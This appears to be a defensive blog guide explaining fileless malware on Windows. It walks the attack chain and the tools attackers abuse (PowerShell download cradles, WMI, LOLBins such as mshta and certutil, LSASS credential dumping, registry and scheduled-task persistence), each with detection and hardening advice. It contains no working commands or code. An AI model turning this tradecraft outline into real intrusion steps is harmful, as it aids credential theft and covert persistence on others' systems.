Fileless malware is one of the most misunderstood topics in security.
It doesn’t mean “no artifacts.” It means attackers minimize traditional malware on disk and instead execute through memory + trusted Windows tooling (PowerShell, WMI, LOLBins, scheduled tasks, registry, and more). That tradecraft makes classic “scan the EXE” defenses less effective.
This guide is designed for practitioners and curious builders: you’ll get a clean mental model, the full attack chain, and the essential Windows/Microsoft components fileless attacks commonly abuse.
What you’ll learn
- A practical definition of fileless malware (and what it is not)
- The typical fileless attack chain from initial access to impact
- The Windows components attackers commonly abuse (PowerShell, WMI,
- LOLBins, registry, tasks, memory injection)
- A defender checklist: what to log, what to hunt, and what to harden
Fileless malware in one sentence
Fileless malware is malicious behavior that runs primarily in memory and/or through legitimate system tools, leaving fewer traditional malicious files on disk.
What it’s not
- Not “undetectable.” It’s detectable with the right telemetry.
- Not always “no files ever.” Many intrusions are hybrid: a small dropper or macro kicks things off, then later stages go fileless.
The fileless attack chain (end-to-end)
Think of fileless tradecraft as a chain. If you can see the chain, you can break it.
1) Initial access
Common starting points:
- Phishing (credential theft or script execution)
- Exploited public-facing apps (VPN, web apps, appliances)
- Malicious documents or HTML attachments that launch scripts
- Stolen credentials + MFA fatigue / token theft
Why it matters: fileless behavior often shows up after initial access. The entry point can look ordinary.
2) Execution (without a classic EXE)
Attackers try to execute through trusted binaries:
- PowerShell download cradles (fetch + execute in memory)
- mshta / rundll32 / regsvr32 as launchers
- WMI process creation
- Script engines (wscript/cscript)
Defender signal: suspicious parent/child process chains (Office → PowerShell is the classic).
3) Discovery
Once running, attackers enumerate:
- User context, privileges, domain membership
- Security tooling present
- Network shares, high-value hosts
Often done with:
- PowerShell cmdlets
- WMI queries
- Native commands (whoami, nltest, net, ipconfig)
4) Credential access
Fileless intrusions frequently aim to turn “one endpoint” into “org-wide access”:
- LSASS access and credential dumping (often via memory techniques)
- Token theft / session hijacking
- Browser credential extraction
- Kerberos abuse in advanced cases
5) Persistence
Instead of installing a new service binary, fileless persistence often uses:
- Registry Run keys
- Scheduled tasks
- WMI event subscriptions
- Startup scripts
6) Defense evasion
- Common patterns: PowerShell/script obfuscation
- Living-off-the-land to avoid suspicious binaries
- Attempting to reduce visibility (where possible)
7) Command & control (C2)
Even fileless attacks need comms:
- HTTPS to cloud-like endpoints
- Beaconing patterns (regular intervals)
- Sometimes legitimate services used for staging
8) Lateral movement
Often done with:
- Remote PowerShell
- WMI remote execution
- SMB admin shares
- RDP with stolen creds
9) Actions on objectives
- Data theft
- Ransomware deployment (often not fileless at the final stage)
- Long-term persistence for espionage
The essential Windows components fileless attacks abuse
Here’s the “parts list.” If you understand these components, fileless malware stops feeling mysterious.
A) PowerShell
Why attackers love it: powerful, flexible, ubiquitous.
Common abuse patterns:
- Encoded Command
- Download + execute in memory
- Obfuscation and string manipulation
Defender ideas:
- Baseline normal PowerShell usage
- Alert on Office → PowerShell
- Watch for unusual outbound connections from PowerShell
B) WMI (Windows Management Instrumentation)
Why it’s abused: remote execution + stealthy persistence.
Common abuse patterns:
- Remote process execution
- WMI event subscriptions (persistence)
Defender ideas:
- Hunt for unusual WMI consumers/filters
- Watch WMI spawning processes unexpectedly
C) LOLBins (Living-Off-The-Land Binaries)
Legitimate binaries used as launchers:
- rundll32
- regsvr32
- mshta
- certutil
- bitsadmin (legacy but still seen)
Defender ideas:
- Alert on LOLBins making outbound connections
- Watch for LOLBins executing scripts or pulling remote content
D) Script engines (wscript/cscript) and HTA
Why it’s abused: lightweight script execution without compiling.
Defender ideas:
- Monitor scripts executed from user-writable paths
- Flag Office/email clients spawning script engines
E) Memory injection / process hollowing
This is where “fileless” becomes truly in-memory:
- Code injected into legitimate processes
- Process hollowing (replace memory contents)
Defender ideas:
- Watch for suspicious process access patterns
- Correlate unusual parent/child trees with injection telemetry
F) Registry
Used for:
- Persistence (Run keys)
- Storing encoded payloads/config
Defender ideas:
- Monitor changes to Run keys
- Flag unusual registry writes by scripts/Office
G) Scheduled Tasks
Used for reliable persistence:
- Tasks that execute PowerShell/LOLBins
Defender ideas:
- Alert on new tasks created by unusual accounts
- Review tasks that run from user directories
H) Office + browsers
Often involved in:
- Launching initial scripts
- Credential/token targeting
Defender ideas:
- Watch Office spawning PowerShell/cmd/wscript
- Monitor unusual access to browser credential stores
I) Identity and cloud tokens (modern “fileless”)
Some attacks are “fileless” because the attacker doesn’t need malware at all:
- Stolen session tokens
- OAuth app abuse
- MFA fatigue
Defender ideas:
- Monitor risky sign-ins and impossible travel
- Audit OAuth consent grants
Defender checklist (what to do next)
1) Get the right visibility
•Collect process creation + command-line telemetry
•Enable PowerShell logging where appropriate (script block/module logging)
•Centralize Windows logs into your SIEM
•Monitor identity events (sign-ins, conditional access, risky users)
2) Hunt the highest-signal behaviors
- Office → PowerShell chains
- Encoded PowerShell commands
- LOLBins with outbound network connections
- New scheduled tasks executing scripts
- WMI persistence artifacts
3) Reduce the attack surface
- Reduce local admin usage
- Constrain scripting where feasible
- Apply application control where appropriate
- Patch aggressively (initial access often exploits known vulns)
Common mistakes
- Treating “fileless” as “no evidence.” It’s “different evidence.”
- Over-alerting on all PowerShell. Baselines matter.
- Ignoring identity. Token theft and OAuth abuse are increasingly common.
Actionable next steps
- Pick your top 5 suspicious process chains to monitor.
- Validate you’re collecting command-line + PowerShell telemetry.
- Build detections for LOLBins + outbound connections.
- Review persistence mechanisms: tasks, registry, WMI.
- Run a tabletop: “What would we do if we saw fileless behavior on a domain-joined endpoint?”
Recommended training
If you want hands-on exposure to attacker tradecraft (including living-off-the-land techniques and post-exploitation behaviors), the CEHv13 course is a strong foundation:
FAQ
Is fileless malware only a Windows thing?
No, but Windows is a common target because of the rich built-in administration and scripting ecosystem.
Does fileless malware always use PowerShell?
Not always, but PowerShell is one of the most common tools used for execution and discovery.
Can EDR detect fileless malware?
Yes—especially when it captures process trees, command lines, memory behaviors, and suspicious process access.
What’s the fastest risk reduction move?
Improve visibility, reduce local admin, harden scripting, and monitor the most common suspicious execution chains.